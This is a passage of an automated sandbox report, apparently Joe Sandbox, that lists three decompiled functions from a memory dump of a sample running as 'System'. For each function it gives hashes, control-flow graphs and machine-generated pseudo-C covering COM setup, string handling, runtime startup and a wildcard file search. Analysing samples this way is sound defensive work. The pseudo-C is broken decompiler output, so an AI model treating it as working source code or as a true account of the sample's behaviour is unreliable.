                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Initialize$CreateInstanceSecurityUninitialize
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 374467530-0
                                                                                                                                                              • Opcode ID: 31dc1ae78160c0bc2cc1bda152d586d5e071129c97ca68f9e38efee2764e703a
                                                                                                                                                              • Instruction ID: dd98d554193eb8d06f48e89c56e6321451906189f4870c4c62229ff59c3c13f2
                                                                                                                                                              • Opcode Fuzzy Hash: 31dc1ae78160c0bc2cc1bda152d586d5e071129c97ca68f9e38efee2764e703a
                                                                                                                                                              • Instruction Fuzzy Hash: C7319E3BA58A4286E710DB71A480BA933B5FB88B88F454436DE4D97655DF3EE006C709
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C443F0 Relevance: 6.2, APIs: 4, Instructions: 228COMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 1157 7ff6e4c443f0-7ff6e4c44459 1158 7ff6e4c44460-7ff6e4c44467 1157->1158 1158->1158 1159 7ff6e4c44469-7ff6e4c44481 call 7ff6e4c4a9a0 call 7ff6e4c50f20 1158->1159 1163 7ff6e4c44486-7ff6e4c4448f 1159->1163 1164 7ff6e4c44491-7ff6e4c444a2 1163->1164 1165 7ff6e4c444c2-7ff6e4c444f1 call 7ff6e4c54230 1163->1165 1166 7ff6e4c444bd call 7ff6e4c623d0 1164->1166 1167 7ff6e4c444a4-7ff6e4c444b7 1164->1167 1173 7ff6e4c444f5-7ff6e4c444f8 1165->1173 1166->1165 1167->1166 1169 7ff6e4c4473b-7ff6e4c44740 call 7ff6e4c6a5f8 1167->1169 1177 7ff6e4c44741-7ff6e4c44746 call 7ff6e4c6a5f8 1169->1177 1175 7ff6e4c4458c-7ff6e4c4459d call 7ff6e4c531d0 1173->1175 1176 7ff6e4c444fe-7ff6e4c44519 1173->1176 1184 7ff6e4c446bc-7ff6e4c446ce call 7ff6e4c515d0 1175->1184 1185 7ff6e4c445a3-7ff6e4c445aa 1175->1185 1179 7ff6e4c44520-7ff6e4c44528 1176->1179 1179->1179 1182 7ff6e4c4452a-7ff6e4c44550 call 7ff6e4c4a9a0 call 7ff6e4c545a0 1179->1182 1203 7ff6e4c44583-7ff6e4c44587 1182->1203 1204 7ff6e4c44552-7ff6e4c44563 1182->1204 1197 7ff6e4c446fc-7ff6e4c4472e call 7ff6e4c623b0 1184->1197 1198 7ff6e4c446d0-7ff6e4c446dd 1184->1198 1187 7ff6e4c4465d-7ff6e4c4468d 1185->1187 1188 7ff6e4c445b0 1185->1188 1192 7ff6e4c446a8-7ff6e4c446b8 call 7ff6e4c623d0 1187->1192 1193 7ff6e4c4468f-7ff6e4c446a2 1187->1193 1194 7ff6e4c445b4-7ff6e4c445bb 1188->1194 1192->1184 1193->1192 1199 7ff6e4c4472f-7ff6e4c44734 call 7ff6e4c6a5f8 1193->1199 1201 7ff6e4c445bd-7ff6e4c445cb 1194->1201 1202 7ff6e4c445ee-7ff6e4c44605 1194->1202 1205 7ff6e4c446f7 call 7ff6e4c623d0 1198->1205 1206 7ff6e4c446df-7ff6e4c446f2 1198->1206 1217 7ff6e4c44735-7ff6e4c4473a call 7ff6e4c6a5f8 1199->1217 1212 7ff6e4c445e9 call 7ff6e4c623d0 1201->1212 1213 7ff6e4c445cd-7ff6e4c445e0 1201->1213 1207 7ff6e4c44638-7ff6e4c44653 1202->1207 1208 7ff6e4c44607-7ff6e4c44615 1202->1208 1203->1173 1215 7ff6e4c4457e call 7ff6e4c623d0 1204->1215 1216 7ff6e4c44565-7ff6e4c44578 1204->1216 1205->1197 1206->1217 1218 7ff6e4c446f4 1206->1218 1207->1194 1222 7ff6e4c44659 1207->1222 1219 7ff6e4c44617-7ff6e4c4462a 1208->1219 1220 7ff6e4c44633 call 7ff6e4c623d0 1208->1220 1212->1202 1213->1199 1225 7ff6e4c445e6 1213->1225 1215->1203 1216->1177 1216->1215 1217->1169 1218->1205 1219->1199 1227 7ff6e4c44630 1219->1227 1220->1207 1222->1187 1225->1212 1227->1220
                                                                                                                                                              C-Code - Quality: 20%
                                                                                                                                                              			E00007FF67FF6E4C443F0(long long __rbx, void* __rcx, void* __rdx, long long __r8) {
				void* __rdi;
				void* _t82;
				void* _t84;
				void* _t85;
				void* _t86;
				signed long long _t112;
				long long* _t141;
				intOrPtr _t173;
				intOrPtr _t179;
				long long _t182;
				intOrPtr _t185;
				void* _t186;
				intOrPtr _t192;
				void* _t195;
				void* _t196;
				intOrPtr _t197;
				void* _t199;
				void* _t202;
				void* _t203;
				void* _t205;
				intOrPtr _t215;
				void* _t221;
				void* _t222;
				void* _t223;
				char* _t224;
				long long _t226;

				 *((long long*)(_t205 + 0x20)) = __rbx;
				_t203 = _t205 - 0x37;
				_t112 =  *0xe4ca90a0; // 0x1ae1b17e2973
				 *(_t203 + 0x27) = _t112 ^ _t205 - 0x000000d0;
				_t224 = __r8;
				_t196 = __rdx;
				 *((long long*)(_t203 - 0x59)) = __r8;
				asm("xorps xmm0, xmm0");
				asm("movups [ebp-0x39], xmm0");
				asm("movups [ebp-0x29], xmm0");
				asm("movups [ebp-0x19], xmm0");
				asm("movups [ebp-0x9], xmm0");
				asm("movups [ebp+0x7], xmm0");
				asm("movups [ebp+0x17], xmm0");
				r15d = 0;
				 *((long long*)(_t203 - 0x79)) = _t226;
				 *((long long*)(_t203 - 0x69)) = _t226;
				 *((long long*)(_t203 - 0x61)) = 0xf;
				 *((intOrPtr*)(_t203 - 0x79)) = r15b;
				if ( *((intOrPtr*)(__rcx + 0xffffffff)) != r15b) goto 0xe4c44460;
				E00007FF67FF6E4C4A9A0(_t203 - 0x79, __rcx, 0);
				E00007FF67FF6E4C50F20(_t112 ^ _t205 - 0x000000d0, __rbx, _t203 - 0x39, _t203 - 0x79, __r8, _t222); // executed
				_t173 =  *((intOrPtr*)(_t203 - 0x61));
				if (_t173 - 0x10 < 0) goto 0xe4c444c2;
				if (_t173 + 1 - 0x1000 < 0) goto 0xe4c444bd;
				if ( *((intOrPtr*)(_t203 - 0x79)) -  *((intOrPtr*)( *((intOrPtr*)(_t203 - 0x79)) - 8)) + 0xfffffff8 - 0x1f > 0) goto 0xe4c4473b;
				0xe4c623d0(_t223, _t195, _t199, _t202);
				 *((long long*)(_t203 - 0x69)) = _t226;
				 *((long long*)(_t203 - 0x61)) = 0xf;
				 *((char*)(_t203 - 0x79)) = 0;
				asm("xorps xmm0, xmm0");
				asm("movups [ebp-0x51], xmm0");
				 *((long long*)(_t203 - 0x41)) = 0;
				E00007FF67FF6E4C54230(0, _t203 - 0x39, _t203 - 0x51);
				if ( *((intOrPtr*)(_t203 - 0x51)) ==  *((intOrPtr*)(_t203 - 0x49))) goto 0xe4c4458c;
				 *((long long*)(_t203 - 0x79)) = _t226;
				 *((long long*)(_t203 - 0x69)) = _t226;
				 *((long long*)(_t203 - 0x61)) = 0xf;
				 *((char*)(_t203 - 0x79)) = 0;
				if ( *((char*)(_t196 + 0xffffffff)) != 0) goto 0xe4c44520;
				E00007FF67FF6E4C4A9A0(_t203 - 0x79, _t196, 0);
				E00007FF67FF6E4C545A0(_t84, _t85, _t86, _t203 - 0x39,  *((intOrPtr*)(_t203 - 0x51)), _t203 - 0x79, _t221, _t222);
				_t179 =  *((intOrPtr*)(_t203 - 0x61));
				if (_t179 - 0x10 < 0) goto 0xe4c44583;
				if (_t179 + 1 - 0x1000 < 0) goto 0xe4c4457e;
				if ( *((intOrPtr*)(_t203 - 0x79)) -  *((intOrPtr*)( *((intOrPtr*)(_t203 - 0x79)) - 8)) + 0xfffffff8 - 0x1f > 0) goto 0xe4c44741;
				0xe4c623d0();
				goto 0xe4c444f5;
				E00007FF67FF6E4C531D0(_t203 - 0x39, _t196);
				_t215 =  *((intOrPtr*)(_t203 - 0x51));
				if (_t215 == 0) goto 0xe4c446bc;
				_t197 =  *((intOrPtr*)(_t203 - 0x49));
				if (_t215 == _t197) goto 0xe4c4465d;
				_t141 = _t215 + 0x38;
				_t182 =  *_t141;
				if (_t182 - 0x10 < 0) goto 0xe4c445ee;
				if (_t182 + 1 - 0x1000 < 0) goto 0xe4c445e9;
				if ( *((intOrPtr*)(_t141 - 0x18)) -  *((intOrPtr*)( *((intOrPtr*)(_t141 - 0x18)) - 8)) - 8 - 0x1f > 0) goto 0xe4c4472f;
				0xe4c623d0();
				 *((long long*)(_t141 - 8)) = _t226;
				 *_t141 = 0xf;
				 *((char*)(_t141 - 0x18)) = 0;
				_t185 =  *((intOrPtr*)(_t141 - 0x20));
				if (_t185 - 0x10 < 0) goto 0xe4c44638;
				_t186 = _t185 + 1;
				if (_t186 - 0x1000 < 0) goto 0xe4c44633;
				if ( *((intOrPtr*)(_t141 - 0x38)) -  *((intOrPtr*)( *((intOrPtr*)(_t141 - 0x38)) - 8)) - 8 - 0x1f > 0) goto 0xe4c4472f;
				0xe4c623d0();
				 *((long long*)(_t141 - 0x28)) = _t226;
				 *((long long*)(_t141 - 0x20)) = 0xf;
				 *((char*)(_t141 - 0x38)) = 0;
				if (_t141 + 0x70 - 0x38 != _t197) goto 0xe4c445b4;
				if (((_t186 + 0x27 >> 5) + (_t186 + 0x27 >> 5 >> 0x3f)) * 0x70 - 0x1000 < 0) goto 0xe4c446a8;
				if ( *((intOrPtr*)(_t203 - 0x51)) -  *((intOrPtr*)( *((intOrPtr*)(_t203 - 0x51)) - 8)) + 0xfffffff8 - 0x1f > 0) goto 0xe4c4472f;
				0xe4c623d0();
				asm("xorps xmm0, xmm0");
				asm("movdqu [ebp-0x51], xmm0");
				 *((long long*)(_t203 - 0x41)) = _t226;
				_t82 = E00007FF67FF6E4C515D0(_t141 + 0x70, _t203 - 0x39, _t197, _t226);
				_t192 =  *((intOrPtr*)(_t224 + 0x18));
				if (_t192 - 0x10 < 0) goto 0xe4c446fc;
				if (_t192 + 1 - 0x1000 < 0) goto 0xe4c446f7;
				if ( *_t224 -  *((intOrPtr*)( *_t224 - 8)) - 8 - 0x1f > 0) goto 0xe4c44735;
				0xe4c623d0();
				 *((long long*)(_t224 + 0x10)) = _t226;
				 *((long long*)(_t224 + 0x18)) = 0xf;
				 *_t224 = 0;
				return E00007FF67FF6E4C623B0(_t82, _t85,  *(_t203 + 0x27) ^ _t205 - 0x000000d0);
			}





























                                                                                                                                                              0x7ff6e4c443f0
                                                                                                                                                              0x7ff6e4c443fc
                                                                                                                                                              0x7ff6e4c44408
                                                                                                                                                              0x7ff6e4c44412
                                                                                                                                                              0x7ff6e4c44416
                                                                                                                                                              0x7ff6e4c44419
                                                                                                                                                              0x7ff6e4c4441c
                                                                                                                                                              0x7ff6e4c44420
                                                                                                                                                              0x7ff6e4c44423
                                                                                                                                                              0x7ff6e4c44427
                                                                                                                                                              0x7ff6e4c4442b
                                                                                                                                                              0x7ff6e4c4442f
                                                                                                                                                              0x7ff6e4c44433
                                                                                                                                                              0x7ff6e4c44437
                                                                                                                                                              0x7ff6e4c4443b
                                                                                                                                                              0x7ff6e4c4443e
                                                                                                                                                              0x7ff6e4c44442
                                                                                                                                                              0x7ff6e4c44446
                                                                                                                                                              0x7ff6e4c4444e
                                                                                                                                                              0x7ff6e4c44467
                                                                                                                                                              0x7ff6e4c44470
                                                                                                                                                              0x7ff6e4c44481
                                                                                                                                                              0x7ff6e4c44487
                                                                                                                                                              0x7ff6e4c4448f
                                                                                                                                                              0x7ff6e4c444a2
                                                                                                                                                              0x7ff6e4c444b7
                                                                                                                                                              0x7ff6e4c444bd
                                                                                                                                                              0x7ff6e4c444c2
                                                                                                                                                              0x7ff6e4c444c6
                                                                                                                                                              0x7ff6e4c444ce
                                                                                                                                                              0x7ff6e4c444d2
                                                                                                                                                              0x7ff6e4c444d7
                                                                                                                                                              0x7ff6e4c444db
                                                                                                                                                              0x7ff6e4c444e7
                                                                                                                                                              0x7ff6e4c444f8
                                                                                                                                                              0x7ff6e4c444fe
                                                                                                                                                              0x7ff6e4c44502
                                                                                                                                                              0x7ff6e4c44506
                                                                                                                                                              0x7ff6e4c4450e
                                                                                                                                                              0x7ff6e4c44528
                                                                                                                                                              0x7ff6e4c44531
                                                                                                                                                              0x7ff6e4c44542
                                                                                                                                                              0x7ff6e4c44548
                                                                                                                                                              0x7ff6e4c44550
                                                                                                                                                              0x7ff6e4c44563
                                                                                                                                                              0x7ff6e4c44578
                                                                                                                                                              0x7ff6e4c4457e
                                                                                                                                                              0x7ff6e4c44587
                                                                                                                                                              0x7ff6e4c44590
                                                                                                                                                              0x7ff6e4c44596
                                                                                                                                                              0x7ff6e4c4459d
                                                                                                                                                              0x7ff6e4c445a3
                                                                                                                                                              0x7ff6e4c445aa
                                                                                                                                                              0x7ff6e4c445b0
                                                                                                                                                              0x7ff6e4c445b4
                                                                                                                                                              0x7ff6e4c445bb
                                                                                                                                                              0x7ff6e4c445cb
                                                                                                                                                              0x7ff6e4c445e0
                                                                                                                                                              0x7ff6e4c445e9
                                                                                                                                                              0x7ff6e4c445ee
                                                                                                                                                              0x7ff6e4c445f2
                                                                                                                                                              0x7ff6e4c445f9
                                                                                                                                                              0x7ff6e4c445fd
                                                                                                                                                              0x7ff6e4c44605
                                                                                                                                                              0x7ff6e4c4460b
                                                                                                                                                              0x7ff6e4c44615
                                                                                                                                                              0x7ff6e4c4462a
                                                                                                                                                              0x7ff6e4c44633
                                                                                                                                                              0x7ff6e4c44638
                                                                                                                                                              0x7ff6e4c4463c
                                                                                                                                                              0x7ff6e4c44644
                                                                                                                                                              0x7ff6e4c44653
                                                                                                                                                              0x7ff6e4c4468d
                                                                                                                                                              0x7ff6e4c446a2
                                                                                                                                                              0x7ff6e4c446ab
                                                                                                                                                              0x7ff6e4c446b0
                                                                                                                                                              0x7ff6e4c446b3
                                                                                                                                                              0x7ff6e4c446b8
                                                                                                                                                              0x7ff6e4c446c0
                                                                                                                                                              0x7ff6e4c446c6
                                                                                                                                                              0x7ff6e4c446ce
                                                                                                                                                              0x7ff6e4c446dd
                                                                                                                                                              0x7ff6e4c446f2
                                                                                                                                                              0x7ff6e4c446f7
                                                                                                                                                              0x7ff6e4c446fc
                                                                                                                                                              0x7ff6e4c44700
                                                                                                                                                              0x7ff6e4c44708
                                                                                                                                                              0x7ff6e4c4472e

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3668304517-0
                                                                                                                                                              • Opcode ID: fb1e7e850368b757684afa6c324377d5cec43edbd125138204b636fa0d50d89f
                                                                                                                                                              • Instruction ID: d9e46b56f4436aa73fb522eabec3c4a2709d9492bfe2e4a3039782a75d687d53
                                                                                                                                                              • Opcode Fuzzy Hash: fb1e7e850368b757684afa6c324377d5cec43edbd125138204b636fa0d50d89f
                                                                                                                                                              • Instruction Fuzzy Hash: 0C91BE67F54A824AFB00DB75D1843AD2373AB51FD8F605232DA1C67ACADE799081C349
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C6277C Relevance: 6.1, APIs: 4, Instructions: 94COMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              C-Code - Quality: 80%
                                                                                                                                                              			E00007FF67FF6E4C6277C(void* __edx, void* __edi, void* __ebp, void* __esp, void* __eflags, signed int __rax, long long __rbx, long long __rsi, void* __r8, void* __r9, long long _a8, long long _a16) {
				char _v24;
				void* __rdi;
				void* _t17;
				void* _t18;
				void* _t38;
				void* _t44;
				signed int _t58;
				intOrPtr* _t60;
				intOrPtr* _t61;
				long long _t71;
				void* _t85;
				void* _t89;
				void* _t91;

				_t91 = __r9;
				_t89 = __r8;
				_t83 = __rsi;
				_t63 = __rbx;
				_t58 = __rax;
				_t44 = __ebp;
				_a8 = __rbx;
				_a16 = __rsi;
				 *((long long*)(__rax + 0x136840f + __rax * 8)) =  *((long long*)(__rax + 0x136840f + __rax * 8)) + 1;
				 *__rax =  *__rax + _t17;
				sil = 0;
				_v24 = sil;
				_t18 = E00007FF67FF6E4C62414();
				_t71 =  *0xe4caab70; // 0x2
				if (_t71 == 1) goto 0xe4c628de;
				if (_t71 != 0) goto 0xe4c62809;
				 *0xe4caab70 = 1;
				E00007FF67FF6E4C72ADC(__rbx, 0xe4c89538, 0xe4c89570);
				if (_t58 == 0) goto 0xe4c627ea;
				 *0xD9E90000008C =  *((intOrPtr*)(0xd9e90000008c)) + _t38;
				asm("adc eax, 0x26d3f");
				E00007FF67FF6E4C72A78(_t63, 0xe4c894d8, 0xe4c89570, __rsi, _t85); // executed
				 *0xe4caab70 = 2;
				goto 0xe4c62811;
				sil = 1;
				_v24 = sil;
				E00007FF67FF6E4C63260(E00007FF67FF6E4C625C0(_t18, 0xe4c89570));
				if ( *0xff == 0) goto 0xe4c62844;
				if (E00007FF67FF6E4C62528(0xff, 0xff) == 0) goto 0xe4c62844;
				r8d = 0;
				_t13 = _t89 + 2; // 0x2
				_t60 =  *0xff;
				E00007FF67FF6E4C63268( *0xe4c894c0());
				if ( *_t60 == 0) goto 0xe4c62866;
				if (E00007FF67FF6E4C62528(_t60, _t60) == 0) goto 0xe4c62866;
				E00007FF67FF6E4C71CF0( *_t60);
				E00007FF67FF6E4C72C94(E00007FF67FF6E4C72C9C(E00007FF67FF6E4C7241C( *_t60, _t83)));
				_t90 = _t60;
				_t78 =  *_t60; // executed
				E00007FF67FF6E4C4E580(_t18, _t18, __edi, _t44, __esp, E00007FF67FF6E4C62528(_t60, _t60),  *_t60,  *_t60, _t60, _t83, _t91); // executed
				if (E00007FF67FF6E4C630AC(_t60) == 0) goto 0xe4c628e8;
				if (sil != 0) goto 0xe4c6289d;
				E00007FF67FF6E4C71CD4( *_t60,  *_t60, _t60);
				E00007FF67FF6E4C625E4(1, _t13);
				_t61 = _t60;
				if (E00007FF67FF6E4C630AC(_t61) == 0) goto 0xe4c628f0;
				if (_v24 != 0) goto 0xe4c628c1;
				return E00007FF67FF6E4C71CC4(_t78, 0, _t90);
			}
















                                                                                                                                                              0x7ff6e4c6277c
                                                                                                                                                              0x7ff6e4c6277c
                                                                                                                                                              0x7ff6e4c6277c
                                                                                                                                                              0x7ff6e4c6277c
                                                                                                                                                              0x7ff6e4c6277c
                                                                                                                                                              0x7ff6e4c6277c
                                                                                                                                                              0x7ff6e4c6277c
                                                                                                                                                              0x7ff6e4c62781
                                                                                                                                                              0x7ff6e4c62794
                                                                                                                                                              0x7ff6e4c6279b
                                                                                                                                                              0x7ff6e4c6279d
                                                                                                                                                              0x7ff6e4c627a0
                                                                                                                                                              0x7ff6e4c627a5
                                                                                                                                                              0x7ff6e4c627ac
                                                                                                                                                              0x7ff6e4c627b5
                                                                                                                                                              0x7ff6e4c627bd
                                                                                                                                                              0x7ff6e4c627bf
                                                                                                                                                              0x7ff6e4c627d7
                                                                                                                                                              0x7ff6e4c627de
                                                                                                                                                              0x7ff6e4c627e9
                                                                                                                                                              0x7ff6e4c627ec
                                                                                                                                                              0x7ff6e4c627f8
                                                                                                                                                              0x7ff6e4c627fd
                                                                                                                                                              0x7ff6e4c62807
                                                                                                                                                              0x7ff6e4c62809
                                                                                                                                                              0x7ff6e4c6280c
                                                                                                                                                              0x7ff6e4c62818
                                                                                                                                                              0x7ff6e4c62824
                                                                                                                                                              0x7ff6e4c62830
                                                                                                                                                              0x7ff6e4c62832
                                                                                                                                                              0x7ff6e4c62835
                                                                                                                                                              0x7ff6e4c6283b
                                                                                                                                                              0x7ff6e4c62844
                                                                                                                                                              0x7ff6e4c62850
                                                                                                                                                              0x7ff6e4c6285c
                                                                                                                                                              0x7ff6e4c62861
                                                                                                                                                              0x7ff6e4c62876
                                                                                                                                                              0x7ff6e4c6287b
                                                                                                                                                              0x7ff6e4c62881
                                                                                                                                                              0x7ff6e4c62883
                                                                                                                                                              0x7ff6e4c62891
                                                                                                                                                              0x7ff6e4c62896
                                                                                                                                                              0x7ff6e4c62898
                                                                                                                                                              0x7ff6e4c628a1
                                                                                                                                                              0x7ff6e4c628a6
                                                                                                                                                              0x7ff6e4c628b3
                                                                                                                                                              0x7ff6e4c628ba
                                                                                                                                                              0x7ff6e4c628d2

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_is_managed_app__scrt_release_startup_lock
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1321466686-0
                                                                                                                                                              • Opcode ID: 909851f35d45ba9041d985c4c26e8fe5e053dd6630174114f091779d566886f1
                                                                                                                                                              • Instruction ID: a1545f3d330aa0ac7224311fdbbc98f62c96248069675f1003e8c6b4c10f2849
                                                                                                                                                              • Opcode Fuzzy Hash: 909851f35d45ba9041d985c4c26e8fe5e053dd6630174114f091779d566886f1
                                                                                                                                                              • Instruction Fuzzy Hash: 08314E2BE9C14342FA14BB7098953B927B1AF49F84F4480B7D94EC72D3DE6FA445821B
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C43B50 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 110COMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 1292 7ff6e4c43b50-7ff6e4c43b6b 1293 7ff6e4c43b6d 1292->1293 1294 7ff6e4c43b70-7ff6e4c43b77 1292->1294 1293->1294 1295 7ff6e4c43b80-7ff6e4c43b88 1294->1295 1295->1295 1296 7ff6e4c43b8a-7ff6e4c43b8d 1295->1296 1297 7ff6e4c43c96 1296->1297 1298 7ff6e4c43b93-7ff6e4c43b97 1296->1298 1300 7ff6e4c43c9b-7ff6e4c43ca5 1297->1300 1298->1297 1299 7ff6e4c43b9d-7ff6e4c43be4 call 7ff6e4c4a820 call 7ff6e4c42f20 1298->1299 1305 7ff6e4c43be6-7ff6e4c43bfd 1299->1305 1306 7ff6e4c43c1d-7ff6e4c43c22 1299->1306 1307 7ff6e4c43c18 call 7ff6e4c623d0 1305->1307 1308 7ff6e4c43bff-7ff6e4c43c12 1305->1308 1309 7ff6e4c43c27-7ff6e4c43c37 call 7ff6e4c6092c 1306->1309 1310 7ff6e4c43c24 1306->1310 1307->1306 1308->1307 1311 7ff6e4c43ca6-7ff6e4c43cab call 7ff6e4c6a5f8 1308->1311 1316 7ff6e4c43c39-7ff6e4c43c46 call 7ff6e4c42ee0 1309->1316 1317 7ff6e4c43c78-7ff6e4c43c7b 1309->1317 1310->1309 1322 7ff6e4c43c48 1316->1322 1323 7ff6e4c43c6b-7ff6e4c43c77 1316->1323 1317->1300 1320 7ff6e4c43c7d-7ff6e4c43c95 1317->1320 1324 7ff6e4c43c50-7ff6e4c43c56 call 7ff6e4c608ec 1322->1324 1326 7ff6e4c43c5b-7ff6e4c43c5d 1324->1326 1326->1300 1327 7ff6e4c43c5f-7ff6e4c43c69 call 7ff6e4c42ee0 1326->1327 1327->1323 1327->1324
                                                                                                                                                              C-Code - Quality: 66%
                                                                                                                                                              			E00007FF67FF6E4C43B50(void* __edx, intOrPtr* __rcx, void* __r8, void* __r9, void* __r12, void* __r13, void* __r15) {
				void* __rbx;
				void* __rsi;
				void* __rbp;
				void* __r14;
				void* _t22;
				void* _t24;
				void* _t25;
				short _t27;
				void* _t46;
				void* _t48;
				void* _t59;
				signed long long _t62;
				intOrPtr* _t67;
				void* _t72;
				void* _t78;

				_t75 = __r9;
				_t48 = __r9;
				_t78 = __r8;
				_t67 = __rcx;
				if ( *((long long*)(__rcx + 0x18)) - 8 < 0) goto 0xe4c43b70;
				asm("o16 nop [eax+eax]");
				if ( *((short*)( *__rcx + 0xfffffffffffffffe)) != 0) goto 0xe4c43b80;
				if (0xffffffff == 0) goto 0xe4c43c96;
				if (0 !=  *((intOrPtr*)(__rcx + 0x10))) goto 0xe4c43c96;
				 *((long long*)(_t72 + 0x20)) = 0;
				 *((long long*)(_t72 + 0x30)) = 0;
				 *((long long*)(_t72 + 0x38)) = 7;
				 *((short*)(_t72 + 0x20)) = _t27;
				r8d = 1;
				E00007FF67FF6E4C4A820(_t72 + 0x20, "*", __r8);
				E00007FF67FF6E4C42F20(_t67, _t72 + 0x20, __r12, __r13, _t78, __r15);
				_t62 =  *((intOrPtr*)(_t72 + 0x38));
				if (_t62 - 8 < 0) goto 0xe4c43c1d;
				if (2 + _t62 * 2 - 0x1000 < 0) goto 0xe4c43c18;
				_t46 =  *((intOrPtr*)(_t72 + 0x20)) -  *((intOrPtr*)( *((intOrPtr*)(_t72 + 0x20)) - 8)) + 0xfffffff8;
				if (_t46 - 0x1f > 0) goto 0xe4c43ca6;
				0xe4c623d0();
				if ( *((long long*)(_t67 + 0x18)) - 8 < 0) goto 0xe4c43c27;
				_t22 = E00007FF67FF6E4C6092C(_t46, _t48,  *_t67, _t78, _t59, _t48, _t75); // executed
				if (_t46 != 0) goto 0xe4c43c78;
				if (E00007FF67FF6E4C42EE0(_t22, _t48) == 0) goto 0xe4c43c6b;
				_t24 = E00007FF67FF6E4C608EC(); // executed
				if (_t46 != 0) goto 0xe4c43c9b;
				_t25 = E00007FF67FF6E4C42EE0(_t24, _t48);
				if (_t25 != 0) goto 0xe4c43c50;
				return _t25;
			}


















                                                                                                                                                              0x7ff6e4c43b50
                                                                                                                                                              0x7ff6e4c43b5b
                                                                                                                                                              0x7ff6e4c43b5e
                                                                                                                                                              0x7ff6e4c43b63
                                                                                                                                                              0x7ff6e4c43b6b
                                                                                                                                                              0x7ff6e4c43b77
                                                                                                                                                              0x7ff6e4c43b88
                                                                                                                                                              0x7ff6e4c43b8d
                                                                                                                                                              0x7ff6e4c43b97
                                                                                                                                                              0x7ff6e4c43b9f
                                                                                                                                                              0x7ff6e4c43ba4
                                                                                                                                                              0x7ff6e4c43ba9
                                                                                                                                                              0x7ff6e4c43bb2
                                                                                                                                                              0x7ff6e4c43bb7
                                                                                                                                                              0x7ff6e4c43bc7
                                                                                                                                                              0x7ff6e4c43bd5
                                                                                                                                                              0x7ff6e4c43bdb
                                                                                                                                                              0x7ff6e4c43be4
                                                                                                                                                              0x7ff6e4c43bfd
                                                                                                                                                              0x7ff6e4c43c0a
                                                                                                                                                              0x7ff6e4c43c12
                                                                                                                                                              0x7ff6e4c43c18
                                                                                                                                                              0x7ff6e4c43c22
                                                                                                                                                              0x7ff6e4c43c30
                                                                                                                                                              0x7ff6e4c43c37
                                                                                                                                                              0x7ff6e4c43c46
                                                                                                                                                              0x7ff6e4c43c56
                                                                                                                                                              0x7ff6e4c43c5d
                                                                                                                                                              0x7ff6e4c43c62
                                                                                                                                                              0x7ff6e4c43c69
                                                                                                                                                              0x7ff6e4c43c77

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
